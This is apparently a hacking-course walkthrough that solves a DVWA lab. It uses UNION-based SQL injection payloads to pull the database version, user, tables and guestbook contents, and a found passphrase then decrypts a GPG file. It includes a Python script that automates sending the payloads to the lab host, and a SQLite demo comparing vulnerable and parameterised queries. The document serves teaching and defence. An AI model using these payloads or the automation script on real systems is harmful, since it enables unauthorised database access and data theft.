To obtain the key you must go to http://pruebas.euskalert.net and demonstrate the skills acquired in the previous tasks. Yoda gives you an important hint:
To solve the enigma we follow the steps of task 2 of the second unit (SQL Injection), using the same username/password and setting the security level to low.
First we obtain the database version. The statement to send is:
%' or 0=0 union select null, version() #
ID: %' or 0=0 union select null, version() #
First name: admin    Surname: admin
First name: Gordon   Surname: Brown
First name: Hack     Surname: Me
First name: Pablo    Surname: Picasso
First name: Bob      Surname: Smith
First name:          Surname: 5.5.44-0+deb8u1
The MySQL database version is 5.5.44-0+deb8u1. The last row, with an empty First name, is the one our UNION added (its first column is the null we selected); the five rows above it are the genuine users, which are still returned because 'or 0=0' is always true.
Next, the database user under which the PHP code connects. The statement is:
%' or 0=0 union select null, user() #
ID: %' or 0=0 union select null, user() #
First name: admin    Surname: admin
First name: Gordon   Surname: Brown
First name: Hack     Surname: Me
First name: Pablo    Surname: Picasso
First name: Bob      Surname: Smith
First name:          Surname: dvwa@localhost
The database user the PHP code runs as is dvwa@localhost.
The next step is to obtain the name of the database:
%' or 0=0 union select null, database() #
ID: %' or 0=0 union select null, database() #
First name: admin    Surname: admin
First name: Gordon   Surname: Brown
First name: Hack     Surname: Me
First name: Pablo    Surname: Picasso
First name: Bob      Surname: Smith
First name:          Surname: dvwa
The database name is dvwa.
List all tables in the database. From here on 'and 1=0' replaces 'or 0=0': the application's original WHERE clause is now always false, so the five genuine user rows disappear and only the rows contributed by the UNION are displayed.
%' and 1=0 union select null, table_name from information_schema.tables #
ID: %' and 1=0 union select null, table_name from information_schema.tables #
Surname: CHARACTER_SETS, COLLATIONS, COLLATION_CHARACTER_SET_APPLICABILITY, COLUMNS, COLUMN_PRIVILEGES, ENGINES, EVENTS, FILES, GLOBAL_STATUS, GLOBAL_VARIABLES, KEY_COLUMN_USAGE, PARAMETERS, PARTITIONS, PLUGINS, PROCESSLIST, PROFILING, REFERENTIAL_CONSTRAINTS, ROUTINES, SCHEMATA, SCHEMA_PRIVILEGES, SESSION_STATUS, SESSION_VARIABLES, STATISTICS, TABLES, TABLESPACES, TABLE_CONSTRAINTS, TABLE_PRIVILEGES, TRIGGERS, USER_PRIVILEGES, VIEWS, INNODB_BUFFER_PAGE, INNODB_TRX, INNODB_BUFFER_POOL_STATS, INNODB_LOCK_WAITS, INNODB_CMPMEM, INNODB_CMP, INNODB_LOCKS, INNODB_CMPMEM_RESET, INNODB_CMP_RESET, INNODB_BUFFER_PAGE_LRU, guestbook, users
(The query was not filtered by table_schema, so the upper-case names are the tables of information_schema itself; only 'guestbook' and 'users' belong to the dvwa database. Adding "where table_schema = database()" would list just those two.)
Tables whose name begins with 'user':
SQL statement: %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#
ID: Setencia SQL %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#
First name:   Surname: USER_PRIVILEGES
First name:   Surname: users
(The words "Setencia SQL" were pasted into the form together with the payload and are echoed back in the ID. This is harmless: everything before %' only becomes part of the LIKE pattern, and 'and 1=0' discards that match anyway.)
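Pasting each statement into the form by hand and reading the echoed page is tedious, and the raw output above shows how hard it is to read. The following Python script is an added example, not part of the original write-up or of DVWA: it builds the same "%' and 1=0 union select null, ... #" payloads, sends them the way the DVWA form does (GET parameters 'id' and 'Submit', with the 'security=low' and PHPSESSID cookies) and parses the "<pre>ID: ... First name: ... Surname: ...</pre>" blocks DVWA prints, keeping only rows whose First name is empty, which are the ones the UNION contributed. The URL path, cookie names and HTML layout are those of stock DVWA and are assumed to hold for the pruebas.euskalert.net instance; the sample HTML at the bottom is constructed so the parser can be exercised offline.

```python
import re
import urllib.parse
import urllib.request

# One <pre> block per result row, as stock DVWA's low-level sqli page prints it
# (assumed to match the target instance).
ROW_RE = re.compile(
    r"<pre>ID:\s*(?P<id>.*?)<br\s*/?>\s*First name:\s*(?P<first>.*?)"
    r"<br\s*/?>\s*Surname:\s*(?P<surname>.*?)</pre>",
    re.S,
)


def union_payload(expr, keep_rows=False):
    """Build the payload used throughout the write-up.

    The leading %' closes the application's LIKE pattern; 'and 1=0' makes the
    original WHERE clause false so only UNION rows come back ('or 0=0' keeps
    the genuine rows as well); 'null' pads the first of the two selected
    columns; '#' (MySQL) comments out the trailing %' the application appends.
    """
    clause = "or 0=0" if keep_rows else "and 1=0"
    return f"%' {clause} union select null, {expr} #"


def parse_rows(html):
    """Return (id, first_name, surname) for every result block in the page."""
    return [
        (m["id"].strip(), m["first"].strip(), m["surname"].strip())
        for m in ROW_RE.finditer(html)
    ]


def injected_values(html):
    """Surnames of the rows our UNION produced: their first_name is NULL,
    which DVWA renders as an empty First name."""
    return [surname for _, first, surname in parse_rows(html) if first == ""]


def query(base_url, phpsessid, expr, keep_rows=False):
    """Send one payload to DVWA and return the values it leaked.

    urlencode turns '#' into %23; typed raw into a URL the browser would treat
    it as a fragment and never send it. Cookie names are stock DVWA's.
    """
    params = urllib.parse.urlencode(
        {"id": union_payload(expr, keep_rows), "Submit": "Submit"}
    )
    req = urllib.request.Request(
        f"{base_url}/vulnerabilities/sqli/?{params}",
        headers={"Cookie": f"security=low; PHPSESSID={phpsessid}"},
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return injected_values(resp.read().decode("utf-8", "replace"))


# Constructed sample of what the version() query returns, for offline use.
SAMPLE_HTML = (
    "<pre>ID: %' or 0=0 union select null, version() #<br />"
    "First name: admin<br />Surname: admin</pre>"
    "<pre>ID: %' or 0=0 union select null, version() #<br />"
    "First name: Bob<br />Surname: Smith</pre>"
    "<pre>ID: %' or 0=0 union select null, version() #<br />"
    "First name: <br />Surname: 5.5.44-0+deb8u1</pre>"
)

if __name__ == "__main__":
    print(union_payload("table_name from information_schema.tables where table_schema = database()"))
    print(injected_values(SAMPLE_HTML))
    # Live use against a logged-in session (PHPSESSID taken from the browser):
    # print(query("http://pruebas.euskalert.net", "<PHPSESSID>", "version()", keep_rows=True))
```

The live call is commented out because it needs a valid session cookie; everything else runs offline against the constructed sample.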
In the same way (by sending further SQL statements) we could pull the contents of any table of interest: 'users', password columns, and so on.
But if we recall what Master Yoda said, the table to look at is 'guestbook'. What does it contain?
The statement to list the columns of the 'guestbook' table is:
%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'guestbook' #
ID: %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'guestbook' #
First name:   Surname: guestbook comment_id
First name:   Surname: guestbook comment
First name:   Surname: guestbook name
(0x0a is a newline, used here only as a separator inside concat so that several columns fit into the single 'Surname' slot.)
Display the contents of the guestbook table:
%' and 1=0 union select null, concat(comment_id,0x0a,comment,0x0a,name,0x0a) from guestbook #
ID: %' and 1=0 union select null, concat(comment_id,0x0a,comment,0x0a,name,0x0a) from guestbook #
First name:   Surname: 1   This is a test comment.   test
First name:   Surname: 2   These aren't the droids you'r looking for...   Obi-Wan Kenobi
First name:   Surname: 3   The key is "use the force", Luke.   Yoda
First name:   Surname: 4   Han Solo shot first!   Anonymous bystander
First name:   Surname: 5   Master Kenobi, you disappoint me. Yoda holds you in such high steem. Surely you can do better!   Count Dooku
First name:   Surname: 6   At last we will reveal ourselves to the Jedi. At last we will have revenge.   Darth Maul
First name:   Surname: 10  Its a trap!   Admiral Ackbar
Of everything in the table, the curious entry is [The key is "use the force", Luke. Yoda]; perhaps "use the force" is the passphrase that decrypts the enigma.
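To see why these payloads work, and what the fix looks like, here is a small Python model of the kind of query that accepts them. It is an added example, not code from the exercise or from DVWA. It assumes the application builds something like SELECT first_name, last_name FROM users WHERE first_name LIKE '%<input>%' by string concatenation (the leading %' of every payload only makes sense against a LIKE pattern; the actual PHP is not shown in the exercise). SQLite stands in for MySQL, so version() becomes sqlite_version(), information_schema.tables becomes sqlite_master, concat(a,0x0a,b) becomes a || char(10) || b, and the trailing comment is '-- ' instead of '#'; the table contents are constructed. The same input is also fed to a parameterised query to show that it is then nothing more than a search string.

```python
import sqlite3

# Constructed data shaped like the exercise's two tables.
USERS = [("admin", "admin"), ("Gordon", "Brown"), ("Hack", "Me"),
         ("Pablo", "Picasso"), ("Bob", "Smith")]
GUESTBOOK = [(1, "This is a test comment.", "test"),
             (3, 'The key is "use the force", Luke.', "Yoda")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT, last_name TEXT);
        CREATE TABLE guestbook (comment_id INTEGER PRIMARY KEY, comment TEXT, name TEXT);
    """)
    conn.executemany("INSERT INTO users (first_name, last_name) VALUES (?, ?)", USERS)
    conn.executemany("INSERT INTO guestbook VALUES (?, ?, ?)", GUESTBOOK)
    return conn


def search_vulnerable(conn, user_input):
    """Assumed shape of the exercise's query: the input is glued into the SQL text."""
    sql = f"SELECT first_name, last_name FROM users WHERE first_name LIKE '%{user_input}%'"
    return sql, conn.execute(sql).fetchall()


def search_safe(conn, user_input):
    """Same search with a bound parameter: the input can only ever be a LIKE pattern."""
    sql = "SELECT first_name, last_name FROM users WHERE first_name LIKE ?"
    return conn.execute(sql, (f"%{user_input}%",)).fetchall()


def union_payload(expr, keep_rows=False):
    """The write-up's payload with SQLite's '-- ' in place of MySQL's '#'.

    The SELECT returns two columns, so the UNION must supply two: null pads
    the first, expr fills the second (the 'Surname' slot in DVWA's output).
    'and 1=0' removes the genuine rows, 'or 0=0' keeps them.
    """
    clause = "or 0=0" if keep_rows else "and 1=0"
    return f"%' {clause} union select null, {expr} -- "


def injected(rows):
    """Second-column values of rows whose first column is NULL, i.e. the rows
    the UNION added rather than genuine users."""
    return sorted(r[1] for r in rows if r[0] is None)


if __name__ == "__main__":
    conn = make_db()
    for payload in (
        union_payload("sqlite_version()", keep_rows=True),              # version()
        union_payload("name from sqlite_master where type = 'table'"),  # information_schema.tables
        union_payload("comment || char(10) || name from guestbook"),    # concat(comment,0x0a,name)
    ):
        sql, rows = search_vulnerable(conn, payload)
        print(sql)
        print("  leaked:", injected(rows))
        print("  parameterised:", search_safe(conn, payload))
```

Running it prints the full SQL text the concatenation produces, which makes it obvious where the original WHERE clause ends and the attacker's UNION begins; the parameterised variant returns an empty list for every payload because no first name contains that literal text.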
To decrypt the file we proceed as in task 3 of unit 1.
If all has gone well, a message similar to this appears. The WARNING line means the file was encrypted without an MDC (modification detection code), so GnuPG cannot tell whether the ciphertext was tampered with; GnuPG 2.2.8 and later treat a missing MDC as a hard error and need --ignore-mdc-error to decrypt such a file.
sergio@tux:~$ gpg2 --decrypt Enigma.gpg > resultado_enigma.txt
gpg: CAST5 encrypted data
gpg: encrypted with 1 passphrase
gpg: WARNING: message was not integrity protected
sergio@tux:~$
Otherwise (a wrong passphrase) it reports an invalid session key:
sergio@tux:~/ownCloud/mooc_hacking$ gpg2 --decrypt Enigma.gpg > resultado_enigma.txt
gpg: CAST5 encrypted data
gpg: encrypted with 1 passphrase
gpg: DBG: cleared passphrase cached with ID: SD406FC57F94A64FD
gpg: decryption failed: Invalid session key
sergio@tux:~$
The decrypted message was the following:
Congratulations! You have solved the enigma... you may now request an audience with the Jedi Council: https://www.facebook.com/groups/consejojedimu/